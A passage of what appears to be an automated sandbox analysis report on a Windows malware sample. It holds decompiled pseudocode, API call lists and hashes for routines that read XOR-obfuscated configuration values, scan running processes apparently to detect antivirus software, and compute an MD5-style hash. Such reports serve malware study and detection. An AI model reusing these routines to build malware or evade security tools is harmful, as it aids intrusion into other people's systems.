            							 *0x47ea02c = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t50 = 0;
            					} else {
            						_t78 =  *0x47ea344; // 0x43175ac3
            						_t50 = E047E36C5(_t104, _t102, _t78 ^ 0x02ddbcae);
            					}
            					if(_t50 == 0) {
            						L41:
            						 *0x47ea2ec = 5;
            						goto L42;
            					} else {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
            							goto L41;
            						} else {
            							L42:
            							if(_t102 == 0) {
            								_t51 = 0;
            							} else {
            								_t75 =  *0x47ea344; // 0x43175ac3
            								_t51 = E047E36C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
            							}
            							if(_t51 != 0) {
            								_push(_t51);
            								_t72 = 0x10;
            								_t73 = E047E5B85(_t72);
            								if(_t73 != 0) {
            									_push(_t73);
            									E047E607C();
            								}
            							}
            							if(_t102 == 0) {
            								_t52 = 0;
            							} else {
            								_t70 =  *0x47ea344; // 0x43175ac3
            								_t52 = E047E36C5(_t104, _t102, _t70 ^ 0x93710135);
            							}
            							if(_t52 != 0 && E047E5B85(0, _t52) != 0) {
            								_t122 =  *0x47ea3cc; // 0x5429600
            								E047E5364(_t122 + 4, _t68);
            							}
            							if(_t102 == 0) {
            								_t53 = 0;
            							} else {
            								_t65 =  *0x47ea344; // 0x43175ac3
            								_t53 = E047E36C5(_t104, _t102, _t65 ^ 0x175474b7);
            							}
            							if(_t53 == 0) {
            								L59:
            								_t54 =  *0x47ea348; // 0xc3d5a8
            								_t22 = _t54 + 0x47eb5f3; // 0x616d692f
            								 *0x47ea370 = _t22;
            								goto L60;
            							} else {
            								_t64 = E047E5B85(0, _t53);
            								 *0x47ea370 = _t64;
            								if(_t64 != 0) {
            									L60:
            									if(_t102 == 0) {
            										_t56 = 0;
            									} else {
            										_t61 =  *0x47ea344; // 0x43175ac3
            										_t56 = E047E36C5(_t104, _t102, _t61 ^ 0xf8a29dde);
            									}
            									if(_t56 == 0) {
            										_t57 =  *0x47ea348; // 0xc3d5a8
            										_t23 = _t57 + 0x47eb899; // 0x6976612e
            										_t58 = _t23;
            									} else {
            										_t58 = E047E5B85(0, _t56);
            									}
            									 *0x47ea3e0 = _t58;
            									HeapFree( *0x47ea2d8, 0, _t102);
            									_v12 = 0;
            									goto L67;
            								}
            								goto L59;
            							}
            						}
            					}
            				}
            			}

            0x047e1d8a
            0x047e1d8a
            0x047e1d8a
            0x047e1d8a
            0x047e1d8d
            0x047e1daa
            0x047e1db8
            0x047e1db8
            0x047e1dbd
            0x047e1dd7
            0x047e2045
            0x047e204c
            0x047e2050
            0x047e2050
            0x047e1ddd
            0x047e1de2
            0x047e1dfa
            0x047e2032
            0x047e203c
            0x00000000
            0x047e1e00
            0x047e1e00
            0x047e1e01
            0x047e1e06
            0x047e1e1c
            0x047e1e08
            0x047e1e08
            0x047e1e15
            0x047e1e15
            0x047e1e1e
            0x047e1e27
            0x047e1e29
            0x047e1e33
            0x047e1e38
            0x047e1e38
            0x047e1e33
            0x047e1e3f
            0x047e1e55
            0x047e1e41
            0x047e1e41
            0x047e1e4e
            0x047e1e4e
            0x047e1e59
            0x047e1e5b
            0x047e1e65
            0x047e1e6a
            0x047e1e6a
            0x047e1e65
            0x047e1e71
            0x047e1e87
            0x047e1e73
            0x047e1e73
            0x047e1e80
            0x047e1e80
            0x047e1e8b
            0x047e1e8d
            0x047e1e97
            0x047e1e9c
            0x047e1e9c
            0x047e1e97
            0x047e1ea3
            0x047e1eb9
            0x047e1ea5
            0x047e1ea5
            0x047e1eb2
            0x047e1eb2
            0x047e1ebd
            0x047e1ebf
            0x047e1ec9
            0x047e1ece
            0x047e1ece
            0x047e1ec9
            0x047e1ed5
            0x047e1eeb
            0x047e1ed7
            0x047e1ed7
            0x047e1ee4
            0x047e1ee4
            0x047e1eef
            0x047e1ef1
            0x047e1efb
            0x047e1f00
            0x047e1f00
            0x047e1efb
            0x047e1f07
            0x047e1f1d
            0x047e1f09
            0x047e1f09
            0x047e1f16
            0x047e1f16
            0x047e1f21
            0x047e1f34
            0x047e1f34
            0x00000000
            0x047e1f23
            0x047e1f23
            0x047e1f2d
            0x00000000
            0x047e1f3e
            0x047e1f3e
            0x047e1f40
            0x047e1f56
            0x047e1f42
            0x047e1f42
            0x047e1f4f
            0x047e1f4f
            0x047e1f5a
            0x047e1f5c
            0x047e1f5f
            0x047e1f60
            0x047e1f67
            0x047e1f69
            0x047e1f6a
            0x047e1f6a
            0x047e1f67
            0x047e1f71
            0x047e1f87
            0x047e1f73
            0x047e1f73
            0x047e1f80
            0x047e1f80
            0x047e1f8b
            0x047e1f99
            0x047e1fa3
            0x047e1fa3
            0x047e1fab
            0x047e1fc1
            0x047e1fad
            0x047e1fad
            0x047e1fba
            0x047e1fba
            0x047e1fc5
            0x047e1fd8
            0x047e1fd8
            0x047e1fdd
            0x047e1fe3
            0x00000000
            0x047e1fc7
            0x047e1fca
            0x047e1fcf
            0x047e1fd6
            0x047e1fe8
            0x047e1fea
            0x047e2000
            0x047e1fec
            0x047e1fec
            0x047e1ff9
            0x047e1ff9
            0x047e2004
            0x047e2010
            0x047e2015
            0x047e2015
            0x047e2006
            0x047e2009
            0x047e2009
            0x047e2023
            0x047e2028
            0x047e202e
            0x00000000
            0x047e2031
            0x00000000
            0x047e1fd6
            0x047e1fc5
            0x047e1f2d
            0x047e1f21

            APIs
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E2F
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E61
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1E93
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1EC5
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1EF7
            • StrToIntExA.SHLWAPI(00000000,00000000,?,047EA00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 047E1F29
            • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 047E2028
            • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 047E203C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: f58bf8b4e1c3ccf00c95195871ce199089d86c4c7a167092491d6a3eabcf8309
            • Instruction ID: 8e027201e89a8e8372e9d239eb09454b7d243282f3510545f1602958bcd99cf6
            • Opcode Fuzzy Hash: f58bf8b4e1c3ccf00c95195871ce199089d86c4c7a167092491d6a3eabcf8309
            • Instruction Fuzzy Hash: 05813C70B10104ABD711EBB7DD89DBB77BDEB4C7047A48B25A501DB344EA39F9448760
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E047E30D5() {
            				char _v264;
            				void* _v300;
            				int _t8;
            				intOrPtr _t9;
            				int _t15;
            				void* _t17;
            
            				_t15 = 0;
            				_t17 = CreateToolhelp32Snapshot(2, 0);
            				if(_t17 != 0) {
            					_t8 = Process32First(_t17,  &_v300);
            					while(_t8 != 0) {
            						_t9 =  *0x47ea348; // 0xc3d5a8
            						_t2 = _t9 + 0x47ebe88; // 0x73617661
            						_push( &_v264);
            						if( *0x47ea12c() != 0) {
            							_t15 = 1;
            						} else {
            							_t8 = Process32Next(_t17,  &_v300);
            							continue;
            						}
            						L7:
            						CloseHandle(_t17);
            						goto L8;
            					}
            					goto L7;
            				}
            				L8:
            				return _t15;
            			}

            0x047e30e0
            0x047e30ea
            0x047e30ee
            0x047e30f8
            0x047e3129
            0x047e30ff
            0x047e3104
            0x047e3111
            0x047e311a
            0x047e3131
            0x047e311c
            0x047e3124
            0x00000000
            0x047e3124
            0x047e3132
            0x047e3133
            0x00000000
            0x047e3133
            0x00000000
            0x047e312d
            0x047e3139
            0x047e313e

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E30E5
            • Process32First.KERNEL32(00000000,?), ref: 047E30F8
            • Process32Next.KERNEL32(00000000,?), ref: 047E3124
            • CloseHandle.KERNEL32(00000000), ref: 047E3133
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 420147892-0
            • Opcode ID: 7c3016eb626c2beff235e8d9fbf8f22b60b3004b6a0caaf9dafe76e3f10a1e03
            • Instruction ID: e84ad497415cc88d5cc78291cb7ccfbc555e8ac827060fad950c62b9be5009cc
            • Opcode Fuzzy Hash: 7c3016eb626c2beff235e8d9fbf8f22b60b3004b6a0caaf9dafe76e3f10a1e03
            • Instruction Fuzzy Hash: E2F0BB722005549BD720A677DC49EFB37ACDFCD314F010365FE45C7201EA34E95586A1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D68() {
            				void* _t1;
            				unsigned int _t3;
            				void* _t4;
            				long _t5;
            				void* _t6;
            				intOrPtr _t10;
            				void* _t14;
            
            				_t10 =  *0x404170;
            				_t1 = CreateEventA(0, 1, 0, 0);
            				 *0x40417c = _t1;
            				if(_t1 == 0) {
            					return GetLastError();
            				}
            				_t3 = GetVersion();
            				if(_t3 != 5) {
            					L4:
            					if(_t14 <= 0) {
            						_t4 = 0x32;
            						return _t4;
            					} else {
            						goto L5;
            					}
            				} else {
            					if(_t3 >> 8 > 0) {
            						L5:
            						 *0x40416c = _t3;
            						_t5 = GetCurrentProcessId();
            						 *0x404168 = _t5;
            						 *0x404170 = _t10;
            						_t6 = OpenProcess(0x10047a, 0, _t5);
            						 *0x404164 = _t6;
            						if(_t6 == 0) {
            							 *0x404164 =  *0x404164 | 0xffffffff;
            						}
            						return 0;
            					} else {
            						_t14 = _t3 - _t3;
            						goto L4;
            					}
            				}
            			}

            0x00401d69
            0x00401d77
            0x00401d7d
            0x00401d84
            0x00401ddb
            0x00401ddb
            0x00401d86
            0x00401d8e
            0x00401d9b
            0x00401d9b
            0x00401dd7
            0x00401dd9
            0x00000000
            0x00000000
            0x00000000
            0x00401d90
            0x00401d97
            0x00401d9d
            0x00401d9d
            0x00401da2
            0x00401db0
            0x00401db5
            0x00401dbb
            0x00401dc1
            0x00401dc8
            0x00401dca
            0x00401dca
            0x00401dd4
            0x00401d99
            0x00401d99
            0x00000000
            0x00401d99
            0x00401d97

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.523699854.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.523699854.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.523699854.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 49%
            			E047E16DF(void* __ecx, intOrPtr* _a4) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				void _v76;
            				intOrPtr* _t226;
            				signed int _t229;
            				signed int _t231;
            				signed int _t233;
            				signed int _t235;
            				signed int _t237;
            				signed int _t239;
            				signed int _t241;
            				signed int _t243;
            				signed int _t245;
            				signed int _t247;
            				signed int _t249;
            				signed int _t251;
            				signed int _t253;
            				signed int _t255;
            				signed int _t257;
            				signed int _t259;
            				signed int _t338;
            				signed char* _t348;
            				signed int _t349;
            				signed int _t351;
            				signed int _t353;
            				signed int _t355;
            				signed int _t357;
            				signed int _t359;
            				signed int _t361;
            				signed int _t363;
            				signed int _t365;
            				signed int _t367;
            				signed int _t376;
            				signed int _t378;
            				signed int _t380;
            				signed int _t382;
            				signed int _t384;
            				intOrPtr* _t400;
            				signed int* _t401;
            				signed int _t402;
            				signed int _t404;
            				signed int _t406;
            				signed int _t408;
            				signed int _t410;
            				signed int _t412;
            				signed int _t414;
            				signed int _t416;
            				signed int _t418;
            				signed int _t420;
            				signed int _t422;
            				signed int _t424;
            				signed int _t432;
            				signed int _t434;
            				signed int _t436;
            				signed int _t438;
            				signed int _t440;
            				signed int _t508;
            				signed int _t599;
            				signed int _t607;
            				signed int _t613;
            				signed int _t679;
            				void* _t682;
            				signed int _t683;
            				signed int _t685;
            				signed int _t690;
            				signed int _t692;
            				signed int _t697;
            				signed int _t699;
            				signed int _t718;
            				signed int _t720;
            				signed int _t722;
            				signed int _t724;
            				signed int _t726;
            				signed int _t728;
            				signed int _t734;
            				signed int _t740;
            				signed int _t742;
            				signed int _t744;
            				signed int _t746;
            				signed int _t748;
            
            				_t226 = _a4;
            				_t348 = __ecx + 2;
            				_t401 =  &_v76;
            				_t682 = 0x10;
            				do {
            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
            					_t401 =  &(_t401[1]);
            					_t348 =  &(_t348[4]);
            					_t682 = _t682 - 1;
            				} while (_t682 != 0);
            				_t6 = _t226 + 4; // 0x14eb3fc3
            				_t683 =  *_t6;
            				_t7 = _t226 + 8; // 0x8d08458b
            				_t402 =  *_t7;
            				_t8 = _t226 + 0xc; // 0x56c1184c
            				_t349 =  *_t8;
            				asm("rol eax, 0x7");
            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
            				asm("rol ecx, 0xc");
            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
            				asm("ror edx, 0xf");
            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
            				asm("ror esi, 0xa");
            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
            				_v8 = _t685;
            				_t690 = _v8;
            				asm("rol eax, 0x7");
            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
            				asm("rol ecx, 0xc");
            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
            				asm("ror edx, 0xf");
            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
            				asm("ror esi, 0xa");
            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
            				_v8 = _t692;
            				_t697 = _v8;
            				asm("rol eax, 0x7");
            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
            				asm("rol ecx, 0xc");
            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
            				asm("ror edx, 0xf");
            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
            				asm("ror esi, 0xa");
            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
            				_v8 = _t699;
            				asm("rol eax, 0x7");
            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
            				asm("rol ecx, 0xc");
            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
            				_t508 =  !_t357;
            				asm("ror edx, 0xf");
            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
            				_v12 = _t410;
            				_v12 =  !_v12;
            				asm("ror esi, 0xa");
            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
            				asm("rol eax, 0x5");
            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
            				asm("rol ecx, 0x9");
            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
            				asm("rol edx, 0xe");
            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
            				asm("ror esi, 0xc");
            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
            				asm("rol eax, 0x5");
            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
            				asm("rol ecx, 0x9");
            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
            				asm("rol edx, 0xe");
            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
            				asm("ror esi, 0xc");
            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
            				asm("rol eax, 0x5");
            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
            				asm("rol ecx, 0x9");
            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
            				asm("rol edx, 0xe");
            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
            				asm("ror esi, 0xc");
            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
            				asm("rol eax, 0x5");
            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
            				asm("rol ecx, 0x9");
            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
            				asm("rol edx, 0xe");
            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
            				asm("ror esi, 0xc");
            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
            				asm("rol eax, 0x4");
            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
            				asm("rol ecx, 0xb");
            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
            				asm("rol edx, 0x10");
            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
            				_t599 = _t367 ^ _t420;
            				asm("ror esi, 0x9");
            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
            				asm("rol eax, 0x4");
            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
            				asm("rol edi, 0xb");
            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
            				asm("rol edx, 0x10");
            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
            				_t338 = _t607 ^ _t422;
            				asm("ror ecx, 0x9");
            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
            				asm("rol eax, 0x4");
            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
            				asm("rol esi, 0xb");
            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
            				asm("rol edi, 0x10");
            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
            				_t424 = _t734 ^ _t613;
            				asm("ror ecx, 0x9");
            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
            				asm("rol eax, 0x4");
            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
            				asm("rol edx, 0xb");
            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
            				asm("rol esi, 0x10");
            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
            				asm("ror ecx, 0x9");
            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
            				asm("rol eax, 0x6");
            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
            				asm("rol edx, 0xa");
            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
            				asm("rol esi, 0xf");
            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
            				asm("ror ecx, 0xb");
            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
            				asm("rol eax, 0x6");
            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
            				asm("rol edx, 0xa");
            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
            				asm("rol esi, 0xf");
            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
            				asm("ror ecx, 0xb");
            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
            				asm("rol eax, 0x6");
            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
            				asm("rol edx, 0xa");
            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
            				asm("rol esi, 0xf");
            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
            				asm("ror edi, 0xb");
            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
            				asm("rol eax, 0x6");
            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
            				asm("rol edx, 0xa");
            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
            				_t400 = _a4;
            				asm("rol esi, 0xf");
            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
            				 *_t400 =  *_t400 + _t259;
            				asm("ror eax, 0xb");
            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
            				return memset( &_v76, 0, 0x40);
            			}

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: memset
            • String ID:
            • API String ID: 2221118986-0
            • Opcode ID: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction ID: 1cd9242d13c31591cae5bd88b4276de093ee30bb62b7ff158e5094217d8de185
            • Opcode Fuzzy Hash: 731c4c0f351f3efb1da8e5c57353aa3635b345d7971c0b598f3b3c7e53c72fd3
            • Instruction Fuzzy Hash: C922857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E8551(long _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				signed int _v16;
            				short* _v32;
            				void _v36;
            				void* _t57;
            				signed int _t58;
            				signed int _t61;
            				signed int _t62;
            				void* _t63;
            				signed int* _t68;
            				intOrPtr* _t69;
            				intOrPtr* _t71;
            				intOrPtr _t72;
            				intOrPtr _t75;
            				void* _t76;
            				signed int _t77;
            				void* _t78;
            				void _t80;
            				signed int _t81;
            				signed int _t84;
            				signed int _t86;
            				short* _t87;
            				void* _t89;
            				signed int* _t90;
            				long _t91;
            				signed int _t93;
            				signed int _t94;
            				signed int _t100;
            				signed int _t102;
            				void* _t104;
            				long _t108;
            				signed int _t110;
            
            				_t108 = _a4;
            				_t76 =  *(_t108 + 8);
            				if((_t76 & 0x00000003) != 0) {
            					L3:
            					return 0;
            				}
            				_a4 =  *[fs:0x4];
            				_v8 =  *[fs:0x8];
            				if(_t76 < _v8 || _t76 >= _a4) {
            					_t102 =  *(_t108 + 0xc);
            					__eflags = _t102 - 0xffffffff;
            					if(_t102 != 0xffffffff) {
            						_t91 = 0;
            						__eflags = 0;
            						_a4 = 0;
            						_t57 = _t76;
            						do {
            							_t80 =  *_t57;
            							__eflags = _t80 - 0xffffffff;
            							if(_t80 == 0xffffffff) {
            								goto L9;
            							}
            							__eflags = _t80 - _t91;
            							if(_t80 >= _t91) {
            								L20:
            								_t63 = 0;
            								L60:
            								return _t63;
            							}
            							L9:
            							__eflags =  *(_t57 + 4);
            							if( *(_t57 + 4) != 0) {
            								_t12 =  &_a4;
            								 *_t12 = _a4 + 1;
            								__eflags =  *_t12;
            							}
            							_t91 = _t91 + 1;
            							_t57 = _t57 + 0xc;
            							__eflags = _t91 - _t102;
            						} while (_t91 <= _t102);
            						__eflags = _a4;
            						if(_a4 == 0) {
            							L15:
            							_t81 =  *0x47ea380; // 0x0
            							_t110 = _t76 & 0xfffff000;
            							_t58 = 0;
            							__eflags = _t81;
            							if(_t81 <= 0) {
            								L18:
            								_t104 = _t102 | 0xffffffff;
            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
            								__eflags = _t61;
            								if(_t61 < 0) {
            									_t62 = 0;
            									__eflags = 0;
            								} else {
            									_t62 = _a4;
            								}
            								__eflags = _t62;
            								if(_t62 == 0) {
            									L59:
            									_t63 = _t104;
            									goto L60;
            								} else {
            									__eflags = _v12 - 0x1000000;
            									if(_v12 != 0x1000000) {
            										goto L59;
            									}
            									__eflags = _v16 & 0x000000cc;
            									if((_v16 & 0x000000cc) == 0) {
            										L46:
            										_t63 = 1;
            										 *0x47ea3c8 = 1;
            										__eflags =  *0x47ea3c8;
            										if( *0x47ea3c8 != 0) {
            											goto L60;
            										}
            										_t84 =  *0x47ea380; // 0x0
